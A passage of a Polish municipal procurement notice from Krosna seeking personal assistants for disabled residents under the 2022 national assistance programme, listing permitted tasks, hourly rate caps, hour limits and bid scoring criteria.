pielęgnacyjnych:<br/>a)	myciu głowy, myciu ciała, kąpieli ;<br/>b)	czesaniu;<br/>c)	goleniu;<br/>d)	obcinaniu paznokci rąk i nóg;<br/>e)	zmianie pozycji, np. przesiadaniu się z łóżka/krzesła na wózek, ułożeniu się w łóżku;<br/>f)	zapobieganiu powstaniu odleżyn lub odparzeń;<br/>g)	przygotowaniu i spożywaniu posiłków i napojów;<br/>h)	słaniu łóżka i zmianie pościeli;<br/>7.	wsparcie w prowadzeniu gospodarstwa domowego i wypełnianiu ról społecznych (w przypadku samodzielnego zamieszkiwania): <br/>a)	sprzątaniu mieszkania, w tym urządzeń codziennego użytku i sanitarnych oraz wynoszeniu śmieci;<br/>b)	dokonywaniu bieżących zakupów (towarzyszenie osoby niepełnosprawnej w sklepie – np. informowanie jej o lokalizacji towarów na półkach, podawanie towarów z półek, wkładanie towarów do koszyka/wózka sklepowego, niesienie koszyka (maksymalnie do 5 kg), prowadzenie wózka osoby niepełnosprawnej lub wózka sklepowego, pomoc przy kasie);<br/>c)	myciu okien;<br/>d)	utrzymywaniu w czystości i sprawności sprzętu ułatwiającego codzienne funkcjonowanie (np. wózek, balkonik, podnośnik, kule, elektryczna szczoteczka do zębów, elektryczna golarka, etc.);<br/>e)	praniu i prasowaniu odzieży i pościeli, ewentualnie ich oddawanie i odbiór z pralni (w obecności osoby niepełnosprawnej);<br/>f)	podaniu dziecka do karmienia, podniesieniu, przeniesieniu lub przewinięciu go;<br/>g)	transporcie dziecka osoby niepełnosprawnej np. odebraniu ze żłobka, przedszkola, szkoły (wyłącznie w obecności osoby niepełnosprawnej);<br/>8.	wsparcie w przemieszczaniu się poza miejscem zamieszkania: <br/>a)	pchanie wózka osoby niepełnosprawnej;<br/>b)	pomoc w pokonywaniu barier architektonicznych (np. schody, krawężniki, otwieranie drzwi);<br/>c)	pomoc w orientacji przestrzennej osobom niewidomym i słabowidzącym;<br/>d)	pomoc we wsiadaniu do i wysiadaniu z: tramwaju, autobusu, samochodu, pociągu;<br/>e)	asystowanie podczas podróży środkami komunikacji publicznej, w tym służącymi do transportu osób niepełnosprawnych oraz taksówkami;<br/>f)	transport uczestnika Programu samochodem osoby niepełnosprawnej lub asystenta;<br/>9.	wsparcie w podejmowaniu aktywności życiowej i komunikowaniu się z otoczeniem: <br/>a)	wyjście na spacer;<br/>b)	asystowanie podczas obecności osoby niepełnosprawnej w: kinie, teatrze, muzeum, restauracji, miejscu kultu religijnego, kawiarni, wydarzeniu plenerowym, etc.;<br/>c)	wsparcie w załatwianiu spraw urzędowych i związanych z poszukiwaniem pracy (np. rozmowie z urzędnikiem w wypadku trudności z werbalnym komunikowaniem się, wypełnianiu formularzy);<br/>d)	wsparcie w rozmowie z otoczeniem w wypadku trudności z werbalnym komunikowaniem się;<br/>e)	notowanie dyktowanych przez klienta treści ręcznie i na komputerze;<br/>f)	pomoc w zmianie ubioru i pozycji podczas: wizyt lekarskich, zabiegów rehabilitacyjnych, ćwiczeń fizjoterapeutycznych, pobytu na pływalni;<br/>g)	wsparcie w załatwianiu spraw w punktach usługowych (w obecności osoby niepełnosprawnej).<br/>W podejmowanych działaniach asystent ma obowiązek brania pod uwagę potrzeby <br/>i preferencje uczestnika Programu lub opiekuna prawnego. Zadaniem asystenta nie jest podejmowanie decyzji za osobę niepełnosprawną, a jedynie pomaganie bądź wspieranie jej w realizacji osobistych zamiarów. Asystent realizuje usługi na rzecz osoby niepełnosprawnej i w skutek jej decyzji lub decyzji opiekuna prawnego, a nie dla poszczególnych członków rodzin osoby niepełnosprawnej. W godzinach realizacji usług asystencji osobistej nie mogą być świadczone usługi opiekuńcze lub specjalistyczne usługi opiekuńcze, o których mowa w ustawie z dnia 12 marca 2004 r. o pomocy społecznej (Dz. U. z 2020 r. poz. 1876, z późn. zm.), inne usługi finansowane w ramach Funduszu lub usługi obejmujące analogiczne wsparcie, o którym mowa w ust. 9, finansowane z innych źródeł. Usługa asystencji osobistej na terenie szkoły może być realizowana wyłącznie w przypadku, gdy szkoła nie zapewnia tej usługi.<br/>Czas trwania usług asystenta:<br/>a) usługi asystenta mogą być realizowane przez 24 godziny na dobę, 7 dni w tygodniu, z zastrzeżeniem stosowania w tym zakresie przepisów i norm, o których mowa w Kodeksie pracy, max. liczba 120 godzin na miesiąc (2 osoby po 60 godzin),<br/>b) limit godzin usług asystenta przypadających na 1 uczestnika Programu wynosi nie więcej niż 60 godzin miesięcznie,<br/>c) do czasu realizacji usług asystencji osobistej wlicza się czas oczekiwania/gotowości na świadczenie usług nie dłuższy niż 90 min. Jeżeli czas oczekiwania wynosi więcej niż 90 min., wówczas usługę dojazdu do wybranego miejsca i powrotu z niego rozlicza się jako dwie odrębne usługi powiększone łącznie o 90 min. trwania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty dokonany zostanie w oparciu o następujące kryteria i ich znaczenie:<br/><br/>1	Cena - 60 punktów <br/>2	Doświadczenie w udzielaniu bezpośredniej pomocy osobom niepełnosprawnym - 37 punktów <br/>3	Kwalifikacje zawodowe (wykształcenie/ukończone szkolenia, kursy) - 3 punkty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w udzielaniu bezpośredniej pomocy osobom niepełnosprawnym (na podstawie np. umowy o pracę, umowy o wolontariat, zaświadczenia lekarskiego, oświadczenia w przypadku opiekuna faktycznego), w tym zawodowe, wolontariackie lub osobiste, wynikające z pełnienia roli opiekuna faktycznego Do 6 miesięcy - 0 punktów powyżej 6 miesięcy do 12 miesięcy - 12 punktów powyżej 12 miesięcy do 18 miesięcy - 18 punktów powyżej 18 miesięcy do 24 miesięcy - 24 punktów powyżej 24 miesięcy do 30 miesięcy - 30 punktów powyżej 30 miesięcy - 37 punktów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">37</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe (wykształcenie/ukończone szkolenia, kursy): a)	wykształcenie w zakresie: pedagogika specjalna, terapia zajęciowa lub praca socjalna; tak- 1 punkt, nie - 0 punktów b)	ukończone szkolenia/kursy z zakresu wsparcia osób z niepełnosprawnością i/lub niesamodzielnych, opiekun osoby niepełnosprawnej tak - 1 punkt, nie - 0 punktów; c)	kurs pierwszej pomocy przedmedycznej tak - 1 punkt, nie - 0 punktów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE NR 3<br/>Świadczenie usług w ramach programu „Asystent Osobisty Osoby Niepełnosprawnej” – edycja 2022 przez jednego asystenta osobistego osoby niepełnosprawnej dla dwóch osób z niepełnosprawnością.<br/>Cena ofertowa jednej godziny zegarowej wynagrodzenia z tytułu świadczenia usługi asystenta osobistego osoby niepełnosprawnej nie może przekroczyć 40 zł brutto. Wskazana powyżej cena stanowi wynagrodzenie całkowite Wykonawcy (wynagrodzenie brutto brutto) i uwzględnia wszystkie koszty i składki niezbędne do wykonania powyższego zamówienia przewidziane przepisami prawa, w tym składki na ubezpieczenie społeczne, składkę zdrowotną, składki na Fundusz Pracy, składki na fundusz wypadkowy podatek, wszelkie opłaty/wpłaty na PPK (wynikające z ustawy z dnia 4 października 2018 r. o pracowniczych planach kapitałowych), których obowiązek wynika z aktualnie obowiązujących przepisów zarówno przez Wykonawcę oraz Zamawiającego ( tj. płaca Wykonawcy brutto oraz narzuty na wynagrodzenie ze strony Zamawiającego).<br/>W ramach realizacji zadania nr 3 będą również pokrywane koszty związane bezpośrednio z realizacją usług asystenta, tj.:<br/>•	koszt zakupu biletów komunikacji publicznej/prywatnej jednorazowych lub miesięcznych dla asystenta nie więcej niż 30 zł brutto miesięcznie na asystenta.<br/>•	koszt ubezpieczeń OC lub NNW asystenta związanych ze świadczeniem usługi asystenta nie więcej niż 150 zł jednorazowo na asystenta.<br/>•	koszt zakupu biletów wstępu na wydarzenia kulturalne/rozrywkowe/sportowe/społeczne itp. dla asystenta towarzyszącego uczestnikowi Programu nie więcej niż 25 zł brutto miesięcznie na asystenta.<br/>Usługi asystenta świadczone będą na rzecz osób niepełnosprawnych posiadających orzeczenie o znacznym lub umiarkowanym stopniu niepełnosprawności, zgodnie z ustawą z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych albo orzeczenie równoważne do wyżej wymienionego, które wymagają usługi asystenta w wykonywaniu codziennych czynności oraz funkcjonowaniu w życiu społecznym, uczestników programu „Asystent osobisty osoby niepełnosprawnej” edycja 2022, mieszkańców Gminy Miasta Krosna, zwanych dalej także „uczestnikiem Programu/uczestnikami Programu”.<br/>Usługi asystenta w szczególności mogą polegać na pomocy asystenta w: <br/>1.	wykonywaniu czynności dnia codziennego dla uczestnika Programu;<br/>2.	wyjściu, powrocie lub dojazdach z uczestnikiem Programu w wybrane przez uczestnika miejsca;<br/>3.	załatwianiu spraw urzędowych;<br/>4.	korzystaniu z dóbr kultury (np. muzeum, teatr, kino, galerie sztuki, wystawy);<br/>5.	zaprowadzaniu dzieci z orzeczeniem o niepełnosprawności do placówki oświatowej lub przyprowadzaniu ich z niej.<br/>6.	wsparcie w czynnościach samoobsługowych, w tym utrzymaniu higieny osobistej i czynnościach pielęgnacyjnych:<br/>a)	myciu głowy, myciu ciała, kąpieli ;<br/>b)	czesaniu;<br/>c)	goleniu;<br/>d)	obcinaniu paznokci rąk i nóg;<br/>e)	zmianie pozycji, np. przesiadaniu się z łóżka/krzesła na wózek, ułożeniu się w łóżku;<br/>f)	zapobieganiu powstaniu odleżyn lub odparzeń;<br/>g)	przygotowaniu i spożywaniu posiłków i napojów;<br/>h)	słaniu łóżka i zmianie pościeli;<br/>7.	wsparcie w prowadzeniu gospodarstwa domowego i wypełnianiu ról społecznych (w przypadku samodzielnego zamieszkiwania): <br/>a)	sprzątaniu mieszkania, w tym urządzeń codziennego użytku i sanitarnych oraz wynoszeniu śmieci;<br/>b)	dokonywaniu bieżących zakupów (towarzyszenie osoby niepełnosprawnej w sklepie – np. informowanie jej o lokalizacji towarów na półkach, podawanie towarów z półek, wkładanie towarów do koszyka/wózka sklepowego, niesienie koszyka (maksymalnie do 5 kg), prowadzenie wózka osoby niepełnosprawnej lub wózka sklepowego, pomoc przy kasie);<br/>c)	myciu okien;<br/>d)	utrzymywaniu w czystości i sprawności sprzętu ułatwiającego codzienne funkcjonowanie (np. wózek, balkonik, podnośnik, kule, elektryczna szczoteczka do zębów, elektryczna golarka, etc.);<br/>e)	praniu i prasowaniu odzieży i pościeli, ewentualnie ich oddawanie i odbiór z pralni (w obecności osoby niepełnosprawnej);<br/>f)	podaniu dziecka do karmienia, podniesieniu, przeniesieniu lub przewinięciu go;<br/>g)	transporcie dziecka osoby niepełnosprawnej np. odebraniu ze żłobka, przedszkola, szkoły (wyłącznie w obecności osoby niepełnosprawnej);<br/>8.	wsparcie w przemieszczaniu się poza miejscem zamieszkania: <br/>a)	pchanie wózka osoby niepełnosprawnej;<br/>b)	pomoc w pokonywaniu barier architektonicznych (np. schody, krawężniki, otwieranie drzwi);<br/>c)	pomoc w orientacji przestrzennej osobom niewidomym i słabowidzącym;<br/>d)	pomoc we wsiadaniu do i wysiadaniu z: tramwaju, autobusu, samochodu, pociągu;<br/>e)	asystowanie podczas podróży środkami komunikacji publicznej, w tym służącymi do transportu osób niepełnosprawnych oraz taksówkami;<br/>f)	transport uczestnika Programu samochodem osoby niepełnosprawnej lub asystenta;<br/>9.	wsparcie w podejmowaniu aktywności życiowej i komunikowaniu się z otoczeniem: <br/>a)	wyjście na spacer;<br/>b)	asystowanie podczas obecności osoby niepełnosprawnej w: kinie, teatrze, muzeum, restauracji, miejscu kultu religijnego, kawiarni, wydarzeniu plenerowym, etc.;<br/>c)	wsparcie w załatwianiu spraw urzędowych i związanych z poszukiwaniem pracy (np. rozmowie z urzędnikiem w wypadku trudności z werbalnym komunikowaniem się, wypełnianiu formularzy);<br/>d)	wsparcie w rozmowie z otoczeniem w wypadku trudności z werbalnym komunikowaniem się;<br/>e)	notowanie dyktowanych przez klienta treści ręcznie i na komputerze;<br/>f)	pomoc w zmianie ubioru i pozycji podczas: wizyt lekarskich, zabiegów rehabilitacyjnych, ćwiczeń fizjoterapeutycznych, pobytu na pływalni;<br/>g)	wsparcie w załatwianiu spraw w punktach usługowych (w obecności osoby niepełnosprawnej).<br/>W podejmowanych działaniach asystent ma obowiązek brania pod uwagę potrzeby <br/>i preferencje uczestnika Programu lub opiekuna prawnego. Zadaniem asystenta nie jest podejmowanie decyzji za osobę niepełnosprawną, a jedynie pomaganie bądź wspieranie jej w realizacji osobistych zamiarów. Asystent realizuje usługi na rzecz osoby niepełnosprawnej i w skutek jej decyzji lub decyzji opiekuna prawnego, a nie dla poszczególnych członków rodzin osoby niepełnosprawnej. W godzinach realizacji usług asystencji osobistej nie mogą być świadczone usługi opiekuńcze lub specjalistyczne usługi opiekuńcze, o których mowa w ustawie z dnia 12 marca 2004 r. o pomocy społecznej (Dz. U. z 2020 r. poz. 1876, z późn. zm.), inne usługi finansowane w ramach Funduszu lub usługi obejmujące analogiczne wsparcie, o którym mowa w ust. 9, finansowane z innych źródeł. Usługa asystencji osobistej na terenie szkoły może być realizowana wyłącznie w przypadku, gdy szkoła nie zapewnia tej usługi.<br/>Czas trwania usług asystenta:<br/>a) usługi asystenta mogą być realizowane przez 24 godziny na dobę , 7 dni w tygodniu, z zastrzeżeniem stosowania w tym zakresie przepisów i norm, o których mowa w Kodeksie pracy, max. liczba 120 godzin na miesiąc (2 osoby po 60 godzin)<br/>b) limit godzin usług asystenta przypadających na 1 uczestnika Programu wynosi nie więcej niż 60 godzin miesięcznie;<br/>c) limit godzin usług asystenta na 1 osobę niepełnosprawną posiadającą orzeczenie o umiarkowanym stopniu niepełnosprawności lub dziecko do 16. roku życia z orzeczeniem o niepełnosprawności łącznie ze wskazaniami: konieczności stałej lub długotrwałej opieki lub pomocy innej osoby w związku ze znacznie ograniczoną możliwością samodzielnej egzystencji oraz konieczności stałego współudziału na co dzień opiekuna dziecka w procesie jego leczenia, rehabilitacji i edukacji wynosi nie więcej niż 30 godzin miesięcznie,<br/>d) do czasu realizacji usług asystencji osobistej wlicza się czas oczekiwania/gotowości na świadczenie usług nie dłuższy niż 90 min. Jeżeli czas oczekiwania wynosi więcej niż 90 min., wówczas usługę dojazdu do wybranego miejsca i powrotu z niego rozlicza się jako dwie odrębne usługi powiększone łącznie o 90 min. trwania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty dokonany zostanie w oparciu o następujące kryteria i ich znaczenie:<br/><br/>1	Cena - 60 punktów <br/>2	Doświadczenie w udzielaniu bezpośredniej pomocy osobom niepełnosprawnym - 37 punktów <br/>3	Kwalifikacje zawodowe (wykształcenie/ukończone szkolenia, kursy) - 3 punkty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w udzielaniu bezpośredniej pomocy osobom niepełnosprawnym (na podstawie np. umowy o pracę, umowy o wolontariat, zaświadczenia lekarskiego, oświadczenia w przypadku opiekuna faktycznego), w tym zawodowe, wolontariackie lub osobiste, wynikające z pełnienia roli opiekuna faktycznego Do 6 miesięcy - 0 punktów powyżej 6 miesięcy do 12 miesięcy - 12 punktów powyżej 12 miesięcy do 18 miesięcy - 18 punktów powyżej 18 miesięcy do 24 miesięcy - 24 punktów powyżej 24 miesięcy do 30 miesięcy - 30 punktów powyżej 30 miesięcy - 37 punktów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">37</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe (wykształcenie/ukończone szkolenia, kursy): a)	wykształcenie w zakresie: pedagogika specjalna, terapia zajęciowa lub praca socjalna; tak- 1 punkt, nie - 0 punktów b)	ukończone szkolenia/kursy z zakresu wsparcia osób z niepełnosprawnością i/lub niesamodzielnych, opiekun osoby niepełnosprawnej tak - 1 punkt, nie - 0 punktów; c)	kurs pierwszej pomocy przedmedycznej tak - 1 punkt, nie - 0 punktów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE NR 4<br/>Świadczenie usług w ramach Programu Ministra Rodziny i Polityki Społecznej „Asystent osobisty osoby niepełnosprawnej” – edycja 2022 przez jednego asystenta osobistego osoby niepełnosprawnej dla jednej osoby niepełnosprawnej oraz jednego dziecka niepełnosprawnego do 16 roku życia. <br/>Cena ofertowa jednej godziny zegarowej wynagrodzenia z tytułu świadczenia usługi asystenta osobistego osoby niepełnosprawnej nie może przekroczyć 40 zł brutto. Wskazana powyżej cena stanowi wynagrodzenie całkowite Wykonawcy (wynagrodzenie brutto brutto) i uwzględnia wszystkie koszty i składki niezbędne do wykonania powyższego zamówienia przewidziane przepisami prawa, w tym składki na ubezpieczenie społeczne, składkę zdrowotną, składki na Fundusz Pracy, składki na fundusz wypadkowy podatek, wszelkie opłaty/wpłaty na PPK (wynikające z ustawy z dnia 4 października 2018 r. o pracowniczych planach kapitałowych), których obowiązek wynika z aktualnie obowiązujących przepisów zarówno przez Wykonawcę oraz Zamawiającego ( tj. płaca Wykonawcy brutto oraz narzuty na wynagrodzenie ze strony Zamawiającego).<br/>W ramach realizacji zadania nr 4 będą pokrywane również koszty związane bezpośrednio z realizacją usług asystenta, tj:. <br/>•	koszt zakupu biletów komunikacji publicznej/prywatnej jednorazowych lub miesięcznych dla asystenta nie więcej niż 30 zł brutto miesięcznie na asystenta.<br/>•	koszt ubezpieczeń OC lub NNW asystenta związanych ze świadczeniem usługi asystenta nie więcej niż 150 zł jednorazowo na asystenta.<br/>•	koszt zakupu biletów wstępu na wydarzenia kulturalne/rozrywkowe/sportowe/społeczne itp. dla asystenta towarzyszącego uczestnikowi Programu nie więcej niż 25 zł brutto miesięcznie na asystenta.<br/>Usługi asystenta świadczone będą na rzecz osób niepełnosprawnych posiadających orzeczenie o znacznym lub umiarkowanym stopniu niepełnosprawności, zgodnie z ustawą z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych albo orzeczenie równoważne do wyżej wymienionego, które wymagają usługi asystenta w wykonywaniu codziennych czynności oraz funkcjonowaniu w życiu społecznym, uczestników programu „Asystent osobisty osoby niepełnosprawnej” edycja 2022, mieszkańców Gminy Miasta Krosna, zwanych dalej także „uczestnikiem Programu/uczestnikami Programu”.<br/>Usługi świadczone będą na rzecz dziecka do 16 roku życia z orzeczeniem o niepełnosprawności łącznie ze wskazaniami: konieczności stałej lub długotrwałej opieki lub pomocy innej osoby w związku ze znacznie ograniczoną możliwością samodzielnej egzystencji oraz konieczności stałego współudziału na co dzień opiekuna dziecka w procesie jego leczenia, rehabilitacji i edukacji, które wymaga usługi asystenta w wykonywaniu codziennych czynności oraz funkcjonowaniu w życiu społecznym uczestnika programu „Asystent osobisty osoby niepełnosprawnej”, mieszkańca Gminy Miasta Krosna, zwanych dalej także uczestnikami Programu<br/>Usługi asystenta w szczególności mogą polegać na pomocy asystenta w: <br/>1.	wykonywaniu czynności dnia codziennego dla uczestnika Programu;<br/>2.	wyjściu, powrocie lub dojazdach z uczestnikiem Programu w wybrane przez uczestnika miejsca;<br/>3.	załatwianiu spraw urzędowych;<br/>4.	korzystaniu z dóbr kultury (np. muzeum, teatr, kino, galerie sztuki, wystawy);<br/>5.	zaprowadzaniu dzieci z orzeczeniem o niepełnosprawności do placówki oświatowej lub przyprowadzaniu ich z niej; <br/>6.	wsparcie w czynnościach samoobsługowych, w tym utrzymaniu higieny osobistej i czynnościach pielęgnacyjnych:<br/>i)	myciu głowy, myciu ciała, kąpieli ;<br/>j)	czesaniu;<br/>k)	goleniu;<br/>l)	obcinaniu paznokci rąk i nóg;<br/>m)	zmianie pozycji, np. przesiadaniu się z łóżka/krzesła na wózek, ułożeniu się w łóżku;<br/>n)	zapobieganiu powstaniu odleżyn lub odparzeń;<br/>o)	przygotowaniu i spożywaniu posiłków i napojów;<br/>p)	słaniu łóżka i zmianie pościeli;<br/>7.	wsparcie w prowadzeniu gospodarstwa domowego i wypełnianiu ról społecznych (w przypadku samodzielnego zamieszkiwania): <br/>h)	sprzątaniu mieszkania, w tym urządzeń codziennego użytku i sanitarnych oraz wynoszeniu śmieci;<br/>i)	dokonywaniu bieżących zakupów (towarzyszenie osoby niepełnosprawnej w sklepie – np. informowanie jej o lokalizacji towarów na półkach, podawanie towarów z półek, wkładanie towarów do koszyka/wózka sklepowego, niesienie koszyka (maksymalnie do 5 kg), prowadzenie wózka osoby niepełnosprawnej lub wózka sklepowego, pomoc przy kasie);<br/>j)	myciu okien;<br/>k)	utrzymywaniu w czystości i sprawności sprzętu ułatwiającego codzienne funkcjonowanie (np. wózek, balkonik, podnośnik, kule, elektryczna szczoteczka do zębów, elektryczna golarka, etc.);<br/>l)	praniu i prasowaniu odzieży i pościeli, ewentualnie ich oddawanie i odbiór z pralni (w obecności osoby niepełnosprawnej);<br/>m)	podaniu dziecka do karmienia, podniesieniu, przeniesieniu lub przewinięciu go;<br/>n)	transporcie dziecka osoby niepełnosprawnej np. odebraniu ze żłobka, przedszkola, szkoły (wyłącznie w obecności osoby niepełnosprawnej);<br/>8.	wsparcie w przemieszczaniu się poza miejscem zamieszkania: <br/>g)	pchanie wózka osoby niepełnosprawnej;<br/>h)	pomoc w pokonywaniu barier architektonicznych (np. schody, krawężniki, otwieranie drzwi);<br/>i)	pomoc w orientacji przestrzennej osobom niewidomym i słabowidzącym;<br/>j)	pomoc we wsiadaniu do i wysiadaniu z: tramwaju, autobusu, samochodu, pociągu;<br/>k)	asystowanie podczas podróży środkami komunikacji publicznej, w tym służącymi do transportu osób niepełnosprawnych oraz taksówkami;<br/>l)	transport uczestnika Programu samochodem osoby niepełnosprawnej lub asystenta;<br/>9.	wsparcie w podejmowaniu aktywności życiowej i komunikowaniu się z otoczeniem: <br/>h)	wyjście na spacer;<br/>i)	asystowanie podczas obecności osoby niepełnosprawnej w: kinie, teatrze, muzeum, restauracji, miejscu kultu religijnego, kawiarni, wydarzeniu plenerowym, etc.;<br/>j)	wsparcie w załatwianiu spraw urzędowych i związanych z poszukiwaniem pracy (np. rozmowie z urzędnikiem w wypadku trudności z werbalnym komunikowaniem się, wypełnianiu formularzy);<br/>k)	wsparcie w rozmowie z otoczeniem w wypadku trudności z werbalnym komunikowaniem się;<br/>l)	notowanie dyktowanych przez klienta treści ręcznie i na komputerze;<br/>m)	pomoc w zmianie ubioru i pozycji podczas: wizyt lekarskich, zabiegów rehabilitacyjnych, ćwiczeń fizjoterapeutycznych, pobytu na pływalni;<br/>n)	wsparcie w załatwianiu spraw w punktach usługowych (w obecności osoby niepełnosprawnej).<br/>W podejmowanych działaniach asystent ma obowiązek brania pod uwagę potrzeby <br/>i preferencje uczestnika Programu lub opiekuna prawnego. Zadaniem asystenta nie jest podejmowanie decyzji za osobę niepełnosprawną, a jedynie pomaganie bądź wspieranie jej w realizacji osobistych zamiarów. Asystent realizuje usługi na rzecz osoby niepełnosprawnej i w skutek jej decyzji lub decyzji opiekuna prawnego, a nie dla poszczególnych członków rodzin osoby niepełnosprawnej. W godzinach realizacji usług asystencji osobistej nie mogą być świadczone usługi opiekuńcze lub specjalistyczne usługi opiekuńcze, o których mowa w ustawie z dnia 12 marca 2004 r. o pomocy społecznej (Dz. U. z 2020 r. poz. 1876, z późn. zm.), inne usługi finansowane w ramach Funduszu lub usługi obejmujące analogiczne wsparcie, o którym mowa w ust. 9, finansowane z innych źródeł. Usługa asystencji osobistej na terenie szkoły może być realizowana wyłącznie w przypadku, gdy szkoła nie zapewnia tej usługi.<br/><br/><br/><br/>Czas trwania usług asystenta:<br/>a) usługi asystenta mogą być realizowane przez 24 godziny na dobę , 7 dni w tygodniu, z zastrzeżeniem stosowania w tym zakresie przepisów i norm, o których mowa w Kodeksie pracy, max. liczba 90 godzin na miesiąc (1 osoba po 60 godzin, 1 dziecko po 30 godzin),<br/>b) limit godzin usług asystenta na dziecko do 16. roku życia z orzeczeniem o niepełnosprawności łącznie ze wskazaniami: konieczności stałej lub długotrwałej opieki lub pomocy innej osoby w związku ze znacznie ograniczoną możliwością samodzielnej egzystencji oraz konieczności stałego współudziału na co dzień opiekuna dziecka w procesie jego leczenia, rehabilitacji i edukacji wynosi nie więcej niż 30 godzin miesięcznie,<br/>c) do czasu realizacji usług asystencji osobistej wlicza się czas oczekiwania/gotowości na świadczenie usług nie dłuższy niż 90 min. Jeżeli czas oczekiwania wynosi więcej niż 90 min., wówczas usługę dojazdu do wybranego miejsca i powrotu z niego rozlicza się jako dwie odrębne usługi powiększone łącznie o 90 min. trwania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty dokonany zostanie w oparciu o następujące kryteria i ich znaczenie:<br/><br/>1	Cena - 60 punktów <br/>2	Doświadczenie w udzielaniu bezpośredniej pomocy osobom niepełnosprawnym - 37 punktów <br/>3	Kwalifikacje zawodowe (wykształcenie/ukończone szkolenia, kursy) - 3 punkty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa 